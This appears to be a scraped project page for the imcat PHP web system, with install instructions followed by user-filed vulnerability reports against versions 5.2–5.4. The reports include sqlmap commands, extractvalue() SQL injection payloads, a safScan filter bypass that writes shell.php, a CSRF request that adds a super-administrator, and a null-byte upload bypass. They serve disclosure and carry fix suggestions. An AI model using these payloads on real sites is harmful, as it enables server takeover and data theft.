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imcat's Introduction

贴心猫(imcat) V5.8 Released (2022-01) Compatible PHP8.1.

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  • 贴心猫(imcat) V5.6 Released (2021-06)

What is imcat(贴心猫)?

  • Imcat means IntimateCat(贴心猫), It is a set of general web system, It is a Contracted, Lightweight and Practical System following MIT open source protocol.
  • It is between the framework and CMS, and it is also a practical PHP toolkit.
  • It deeply optimizes the architecture of multi model, multi classification, multi sub page, multi language (sub sites).
  • It's not only the PC side, It can also provide mobile-terminal API conveniently, like as Wap / App / Mini-program.
  • It can be infinitely extended, like as customized Model / user fields / user parameter / classification...
  • It has a cross-border auxiliary system, like as Python crawler, nodejs push or chat service.


  • Support: PHP5.4 ~ PHP8.0 / custom module / custom field / custom parameter / custom classification
  • Data&share REST-API / sync / ourter import / Crawler / seo push / old vertion import
  • Interface: Ftp store / Sphinx search / WeChat / SMS / ip address / map (Baidu, Google) / payments (PayPal, Alipay, caifutong)
  • Demo Website: imcat(贴心猫)


  • Need Environmental

    • PHP5.4 ~ PHP8.0 (Recommend: PHP5.6 ~ PHP7.4)
    • mysql5.1+
    • Extended libs: MySQLi/MySQL, GD2, curl
  • Set the relative path of the site:

    • all files will be placed on the site of any directory;
    • In file: /root/cfgs/boot/_paths.php Set Param: PATH_PROJ;
    • The value of PATH_PROJ is the relative path of the site, eg:['/imcat'] or root [''](empty string)
    • For the first time, It will automatically correct the project path, so you can omit the operation
  • Edit DB-Config(It can be edited while installing, advice you config manually)

    • File: /root/cfgs/boot/cfg_db.php;
    • Tips: the defalut DB-Type is: $_cfgs['db_class'] = 'mysqli';
    • You can Edit it according to the service environment.
  • Setup/Config

    • View Start Page: /index.php?start to Check and Config
    • View Url: /root/tools/setup/ to Setup.

【v5.6 ChangeLog】 (2021-06)

  • 贴心猫(Imcat,IntimateCat) 是以PHP+MySQL架构设计的通用网站系统,简约、轻量、实用、开源、共享。
  • 介于框架和CMS之间,同时也是一个实用的php工具包;
  • 深入优化: 多模型, 多分类, 多子页面, 多语言(分站) 架构;
  • 深度结合:Pc/Wap/App/小程序多端展示;
  • 无限扩展:无限自定义:模型/字段/参数/分类…
  • 跨界辅助:拥有 Python爬虫, Nodejs推送聊天 等辅助系统。


  • 支持:PHP5.4 ~ PHP7.3/自定义模块/自定义字段/自定义参数/自定义分类/模板继承/tag缓存/js标签/静态/伪静态
  • 模型:问答系统/内部公文/商品展销/新闻/专题/课程资源/样例文档/用户
  • 接口:REST-API/Ftp存储/Sphinx 检索/微信/短信/地图/支付/数据分享/数据同步/外部导入/采集/推送/导入旧版


  • 环境需求

    • PHP5.4 ~ PHP8.0 (推荐: PHP5.6 ~ PHP7.4)
    • mysql5.1+
    • 扩展: MySQLi/MySQL, GD2, curl
  • 设置站点相对目录;

    • 文件:/root/cfgs/boot/_paths.php 设置PATH_PROJ值为站点相对目录如:“/imcat”或 根目录用“”(空)等;
    • (首次安装使用会自动更正项目路径,所以可省略上述操作)
  • 修改数据库配置:

    • 文件:/root/cfgs/boot/cfg_db.php;注意数据库类默认为:$_cfgs['db_class'] = 'mysqli';
    • (可安装时配置,如果修改建议手动配置)
  • 安装/配置:

    • 访问起始页:/index.php?start 检查配置;
    • 访问地址:/root/tools/setup/ 安装程序。


imcat's People


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imcat's Issues

imcat 5.2-Arbitrary file read vulnerability

1 ### Overview

Official website:

Version: imcat-5.2

Vulnerability type: arbitrary file reading, causing serious information leakage

Source code:

  1. Source code ### analysis

In the file root tools adbug search.php, click$_ Request receives parameters from the front end and uses file directly without any filtering_ get_ The contents() function gets the contents of the file and prints them directly on the front page; It can jump to the previous directory by the way of "." / ", as long as the program has permission, it can read any file on the system, causing information leakage; The specific code is shown in the following two figures.



  1. Reappearance

(1) Build the environment through phpstudy, and then log in to the background of the website

(2) Visit the following links (you can construct whatever files you want to get, and you can also get system files by ". /" tracing back) \root\cfgs\boot\cfg_ db.php

Code Execution Vulnerability in the background of imcat5.4

1. Overview

Official website:

Version: imcat-5.4

Vulnerability type: Code Execution

Source code:

PS: it is recommended to use php7.0.12 environment. Other environments will have different problems when loopholes recur

2. Source code analysis

In the background of the CMS, an online source code editing function is provided, and then dangerous functions are filtered through the file imcat-5.4, imcat, core, glib and safscan.php. However, due to the incomplete filtering rules of the filtering function, dangerous code can be written and executed, forming a loophole in code execution, The attacker can gain the permission of the server through this vulnerability

3. Reappearance

Use phpstudy to build the environment, and then log in to the background of the website

(1) Select tool - DIY configuration - select any file to modify. I choose index. PHP here

(2) Try to write a sentence
Then save it and find an error, because the filter rule in imcat-5.4, imcat, core, glib, safscan.php file is triggered

(3) Try to write
$ch = explode(".","");
$c = $ch[1].$ch[3].$ch[4]; //assert
Successfully bypassed

(4) Visit fputs(fopen('shell.php','w'),'')
This statement means to create a shell.php file in the same directory as index.php and write a sentence "Trojan horse
Although the page is wrong in reality, the statement has been executed successfully and shell.php has been generated in the same directory

(5) Use ant sword to connect

4. Repair service suggestions

(1) Turn off the function of modifying the source code in the background

(2) Perfect the rules of detection (this is hard to implement)

the vulnerability report: sql injection vulnerability in index.php page .

Exploit vulnerability :
Test parameter : order

Use sqlmap( and use sqlmap-tamper : unmagicquotes
sqlmap -u '' --dbms mysql -p order --tamper='unmagicquotes'


sqlmap -u '' --dbms mysql -p order --tamper='unmagicquotes' --dbs
GET databases;


Build install imcat and test vuln:




The Vuln-src-code:

because php code set database charset=GBK so bypass addslashes or GPC .

Safetity up:

  1. mysql database charset UTF-8
  2. Checking http input(GET/POST) data fiter dangerous that.

CSRF vulnerability in imcat v5.4

1. Overview

Official website:

Version: imcat-5.4

Vulnerability type: CSRF post

Source code:

Harm: Super administrator account can be added

2. Analysis

2.1 logic analysis

In the add administrator page, the security of data source is not verified by token and referer
(1) There is no token used for security verification in the data packet, so there is the possibility of forgery
POST /imcat/root/run/adm.php?dops-a&mod=adminer&view=form&stype=& HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 539
Connection: close
Cookie: Hm_lvt_948dba1e5d873b9c1f1c77078c521c89=1622443371; CKFinder_Path=Files%3A%2F%3A1; v49_sessid_4294e52897e5=2021-6b-hg49-yttfxda8f-7e5f79d1a; v49_Uniqueid_01348a66d0e6=2021-6h-a25c-5s8pgxq58-0e63b0fe2; Hm_lpvt_948dba1e5d873b9c1f1c77078c521c89=1622444424; twVscAv_admauth=1606cECE916XO1gVfiR9ahqpqkEJMTxa4R5XjBOh69Cfppjn2zcpGMtx5x7BRkm4L0Vposdev%2B2ydGfzzC3me67ttA1foMK2UXNSybiOLOvH; v49_vcodes=fmadm%3Dnull%0Afmcomadd%3D1623809462%2C49f8c2fc48af351f%0Afmapply%3D1623830847%2C7da4f846fdbd0243%0A; v49_ocar_items=0; PHPSESSID=5b4be5ad4c47747257ac13a5c15265c9
Upgrade-Insecure-Requests: 1


(2) After deleting the referer: information, you can still add an administrator

3. Loophole recurrence

(1) Environment preparation, building environment with phpstudy
(2) Construct a payload with the function of creating a super administrator account, qwe_ 123/adm_ one hundred and twenty-three

<script>history.pushState('', '', '/')</script> (3) Through a variety of fishing means to lure the administrator to click on the page, that is, to complete the action of adding super administrator without the administrator's knowledge ![image]( ![image]( ![image]( ### 4. Verification of attack results

Using qwe_ 123/adm_ 123 login in the background

5. Means of Defense

Add a token to the place where important actions are performed for authentication. The value of the token must be random and unpredictable

File Upload

Describe the bug
Upload php files to control the target server

Exploit vulnerability :
Upload malicious PHP file here:
PHP file name: 2.php+ 1.jpg


Use Burpsuite,modify Hex 20 -> 00:
before modification:

after modification:

connect PHP file:

The Vuln-src-code:
imcat\core\clib\comUpload.php -> checkType() -> strpos(),because strpos() can not match .php+
imcat\core\clib\comUpload.php -> upEnd() -> in_array() , because In_array() is only used for checking filename whether or not have jpg. ,so we can upload 1.php+ .jpg to bypass filtering.


Credit: @chaitin Tech.

The background management of imcat 5.3 has a getshell vulnerability

1. Environment construction

Source download:


Environmental requirements:Apache 2.4.39 + php 7.3.4 + mysql 5.7.26

2. Vulnerability verification

As shown in the figure below, users can click "Tools->DIY Configuration->DIY Configuration" to edit the website PHP files.


Try to write PHP webshell, as shown in the figure:


Save and find that the system reports an error, as shown in the figure:


At this point, it can be found that the system has a PHP file for security verification, and the eval() dangerous function exists in the PHP webshell, which causes the editing to fail. Find a PHP file upload code on Github (, modify the bootskip.php file to the PHP file upload code.

Visit at this time:


username:username password:yourpassword


Any file can be uploaded at this time, including PHP webshell. as the picture shows:


Visit the url of webshell, as shown in the figure:


3. Vulnerability analysis

Analyze the system imcat/core/glib/safScan.php file, in which some functions with Webshell features are defined.


However, after modifying the PHP file to other scripting languages and functions other than the dangerous function defined for this file, this file will not be intercepted, causing the attacker to modify the PHP file as a file upload function, and then upload the Webshell on this basis. You can get the permissions of the web application.

You code has a Stored-XSS Vulnerability in the backstage

1、Login the backstage




  1. Strictly verify user input, you must perform strict checks and html escape escaping on all input scripts, iframes, etc. The input here is not only the input interface that the user can directly interact with, but also the variables in the HTTP request in the HTTP request, the variables in the HTTP request header, and so on.
  2. Verify the data type and verify its format, length, scope, and content.
  3. Not only need to be verified on the client side but also on the server side.
  4. The output data should also be checked. The values in the database may be output in multiple places on a large website. Even if the input is coded, the security check should be performed at the output points.

Sql injection vulnerability in Latest Release v5.2 product reviews

Hi, I would like to report Sql injection vulnerability in latest release(v5.2) product reviews(/root/plus/coms/add_coms.php)

I found it in the demo(

Add a product reviews

Test the fm[auser] in request body

'and/**/extractvalue('anything',concat('~',(select user())))and'

'and/**/extractvalue('anything',concat('~',(select @@datadir)))and'

'and/**/extractvalue('anything',concat('~',(select database())))and'

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